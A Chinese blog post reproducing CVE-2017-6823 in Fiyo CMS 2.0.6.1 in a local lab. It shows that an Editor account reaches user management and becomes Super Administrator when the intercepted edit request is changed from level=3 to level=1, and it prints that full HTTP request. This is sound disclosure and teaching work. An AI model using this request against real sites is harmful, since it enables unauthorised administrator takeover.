Fiyo CMS 2.0.6.1用户特权提升(CVE-2017-6823)

最新推荐文章于 2024-09-05 12:38:05 发布
最新推荐文章于 2024-09-05 12:38:05 发布
阅读量399 收藏 2
点赞数
文章标签: mysql java php 数据库 spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/M110K/article/details/112486784
版权

Fiyo CMS 2.0.6.1允许低权限用户通过修改级别参数提升到超级管理员权限源码下载:https://sourceforge.net/projects/fiyo-cms环境:PHP5.5+MYSQL5.6+Apache

深度截图20170331150748.png

进入后台,新建几个不同权限的用户

http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/

深度截图20170331151110.png
深度截图20170331151324.png
@building
默认情况下,用户权限与ID对应如下:
Super Administrator = 1
Administrator = 2
Editor = 3
Publisher = 4
Member = 5++
添加用户的链接: http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/?app=user&act=add
深度截图20170331151913.png

CMS默认只有Super Administrator和Administrator权限的用户能够添加新用户
而只有Super Administrator、Administrator、Editor(对应test、test2、test3用户)能够登录进后台,只是Editor(test3)的权限较低,后台UI呈现出的功能菜单少
深度截图20170331152817.png

问题就是出在这个地方:CMS未对添加用户功能(?app=user&act=add)权限限制好,导致Editor(test3)权限的用户也能访问 http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/?app=user
深度截图20170331153316.png

能越权访问还没完,依靠这个越权,能再越权添加(修改)一个用户成超级管理员权限
现在我们再越权修改test3的权限,提升到超级管理员(Super Administrator)
深度截图20170331154041.png

使用BurpSuite拦截请求包 
POST /fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3 HTTP/1.1
Host: 192.168.66.128
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: http://192.168.66.128/fiyo_cms_2.0.6.1/dapur/?app=user&act=edit&id=3
Cookie: ts_email=test%40qq.com; ts_autologin=2eezkit3mx1c4cc0g0gggo0s88ssgg0; bdshare_firstime=1489735593845; UM_distinctid=15adb2a0fd992-0ae9f1ca30c3da8-33634647-e1000-15adb2a0fda414; CNZZDATA1670348=cnzz_eid%3D403630419-1489730836-http%253A%252F%252F192.168.66.128%252F%26ntime%3D1489730836; PHPSESSID=t24p47qopuqjccg34quffe0g20
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

applyedit=Next&id=3&z=test3&user=test3&z=test3&x=&password=&kpassword=&email=test3%40admin.com&level=3&name=test3&bio=

包中的level=3就是对应用户的权限级别(Editor),那么我们将其修改为level=1(Super Administrator)提交出去

深度截图20170331154800.png

注销后重新登录,test3变成Super Administrator权限了
深度截图20170331155054.png

参考:https://www.exploit-db.com/exploits/41594/

KEY0NE
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
苹果MAC-CMS漏洞复现(SQL注入+命令执行漏洞写shell)
信安小菜鸡的博客
05-19 3746
前台修改密码处存在sql注入漏洞 注册账户登录后发送POST 查看数据库 查看用户 不过后续操作一直被拦截,暂未找到过滤方法 命令执行漏洞 直接获取php info信息 写shell 弱口令 admin/admin/123456 ...
Ubuntu 16.04 安装 Docker 以及docker镜像和容器的操作
gxz987的博客
07-19 934
Ubuntu 16.04 安装 Docker 一、安装docker 1.更新ubuntu的apt源索引 sudo apt-get update 2.安装包允许apt通过HTTPS使用仓库 sudo apt-get install \ apt-transport-https \ ca-certificates \ curl \ software-properties...
Fiyo CMS:Fiyo CMS - 自行修复~-开源
06-27
Fiyo CMS id 很容易制作模板 CMS
fiyocms2.0.6.1版本漏洞复现及分析
0nc3的博客
11-09 1347
0x00 前言 0x01 任意文件上传 1.漏洞复现 漏洞位置:admin》Themes》default》Files 点击Simpan时抓包,将src参数和content参数修改为新建文件名和其内容 嗯哼~~ 2.代码分析 0x02 任意文件读取 1.漏洞复现 漏洞位置:admin》Themes》default》Files 点击index.php时抓包 修改参数,读取成功 2.代码分析 ...
最新系统漏洞--Fiyo CMS跨站脚本漏洞
weixin_48555088的博客
11-24 1001
最新系统漏洞2021年11月24日 受影响系统: Fiyo CMS Fiyo CMS 2.0.6.1 描述: Fiyo CMS是一个内容管理系统。 Fiyo CMS 2.0.6.1版本的“tag”参数存在跨站脚本漏洞。未经认证的攻击者可利用该漏洞发起跨站脚本攻击。 <**> 建议: 厂商补丁: Fiyo CMS 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本: https://github.com/FiyoCMS ...
[CVE-2017-13778]Fiyo CMS 2.0.7 Storage XSS
KEY0NE的个人博客
09-02 128
Hello, I found that there are some problems with Fiyo CMS, hoping to help you and your workdapurappsapp_configsys_config.php $_POST[site_name] variable exists Storage XSS vulnerabili...
如何使用php判断远程图片文件是否存在
徊忆羽菲
07-03 377
使用php判断远程图片文件是否存在fopen()方法mode 参数的可能的值 fopen()方法 看看文件能否打开,能打就文件当然就存在 <?php $url = 'http://www.qipa250.com/images/qipa250.jpg'; if( @fopen( $url, 'r' ) ) { echo 'File Exits'; } else { echo 'File Do Not Exits'; } ?> 语法:fopen(filename,mode
maccms-cve_2017_17733漏洞复现
qq_51459600的博客
03-02 4008
maccms-cve_2017_17733 Maccms是一套跨平台的基于PHPMySQL快速建站系统。 Maccms 8.x版本中存在安全漏洞。远程攻击者可借助index.php?m=vod-search请求中的‘wd’参数利用该漏洞执行命令。 环境搭建 靶机:CentOS7(192.168.2.110) 利用本地vulfocus平台一键搭建maccms环境: 环境搭建完成 漏洞利用 访问http://192.168.2.110:59973/index.php?m=vod-search post提
代码审计方法与步骤
u011215939的博客
01-09 4240
代码审计方法与步骤网站审计要点
docker简单使用--docker搭建cms
小石头的博客
02-17 2148
centos安装:yum -y install docker-io 运行 docker version 有结果则为安装成功 启动docker:service docker start 接下来以搭建一个cms为例,封装一个docker镜像 下载一个lamp环境:docker pull mattrayner/lamp:latest-1604 运行docker images 查看存在的d...
如何在 Windows 上 使用 ONLYOFFICE 协作编辑文档
热门推荐
hotqin888的专栏
02-19 15万+
1、说明——可以加我qq504284沟通。 ONLYOFFICE Document Server提供文档协作的服务功能,支持Word,Excel和PowerPoint以及国产WPS的协作。但是这里告诉我们,需要进行文档管理和存储的二次开发。它api里现成的开发好的文档管理平台,有java,node.js,PHP等,可能不具备权限功能吧。 Please note, thatONLYOFFICE.........
CNZZ网站流量统计原理简析
三分地
08-17 1万+
这是我的网站www.iyizhan.com,其中只有一个页面index.html, 在index.html上放置了如下的 js 脚本: src="http://s11.cnzz.com/stat.php?id=5364825&web_id=5364825"  language="JavaScript"> 1.当用户访问这个页面时,会请求src,对应的是上面的脚本的源文件:
编译后的程序是如何在操作系统(linux)中运行的,虚拟地址空间到实际物理内存的访问
chen1540524015的博客
06-25 2872
Linux中,每个进程通过一个task_struct结构体描述,每个进程地址虚拟空间通过一个mm_struct描述,c语言中每个段空间通过vm_area_struct描述,关系如下, 当执行一个程序时,linux创建一个进程,通过sys_exec()将该程序的内容(程序编译后产生的是虚拟地址空间)映射到进程的虚拟地址空间中而不是物理内存中,生成一组vm_area_st
苹果MACCMS V10 后台登录验证码错误
weixin_30376453的博客
11-03 1079
1.因为v10使用的是thinkphp开发,修改php.ini文件中 session.save_path = "/tmp" 所指向的文件夹权限可解决。 转载于:https://www.cnblogs.com/ddwk/p/9900680.html
垂直越权漏洞
JSH_CDX的博客
07-02 2911
漏洞介绍 概述:垂直越权漏洞常见于后台业务系统,当业务系统分为多种角色权限的时候,常会出现低权限用户页面上无高权限用户的功能,但是却可以通过调用接口来进行高权限用户的操作,从而导致垂直越权漏洞出现 测试方法 1.首先用两个浏览器登录高权限账号以及低权限账号,获取到两者的cookie或认证头。 2.通过操作高权限用户的功能(低权限页面上并没有该功能),获取到url地址清单 3.用低权限用户的cook...
MySQL数据库增删查改(基础)CRUD
chendemingxxx的博客
09-02 1220
比如说:创建一张学生表,有姓名,学号。插入两个学生。可能有点草率看看例子: 顺序不是问题,后面参数和前面括号参数对等就行。比如说上面的例子:把id和name参数倒过来了,后面参数一一对应也可以。不推荐使用全列查询原因:比如说上面例子我只要id或者说只要name;当然也可以查询多个列: 比如说我们创建一个这样的表命令:第一个 效果:第三个总分效果:拓展一个现象: 拓展:语法:比较运算符:逻辑运算符:解释:%在mysql这里代表的是多个任意字符,_代表的是 一个任意字符。揭晓来才是修改硬盘里面的内容。案例:
MySQL递归获取商品分类以及所有下级分类商品
cl617287的博客
09-02 343
MySQL通过递归获取所有下级分类数据
mysql用时间戳还是时间存储比较好
最新发布
qq_42572322的博客
09-05 381
TIMESTAMP 通常占用的空间比 DATETIME 少,如果你对存储空间有限制,或者你需要存储大量的时间戳数据,TIMESTAMP 可能是更好的选择。- 如果你的应用需要在不同的时区中使用时间数据,或者需要自动处理夏令时的变化,使用 TIMESTAMP 可能更方便。- 考虑到不同的数据库系统和应用程序可能对时间类型的支持不同,选择一个能够满足你当前和未来需求的时间类型是很重要的。- 对于需要频繁进行日期和时间范围查询的场景,DATETIME 类型可能更适合,因为它允许更灵活的日期和时间计算。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值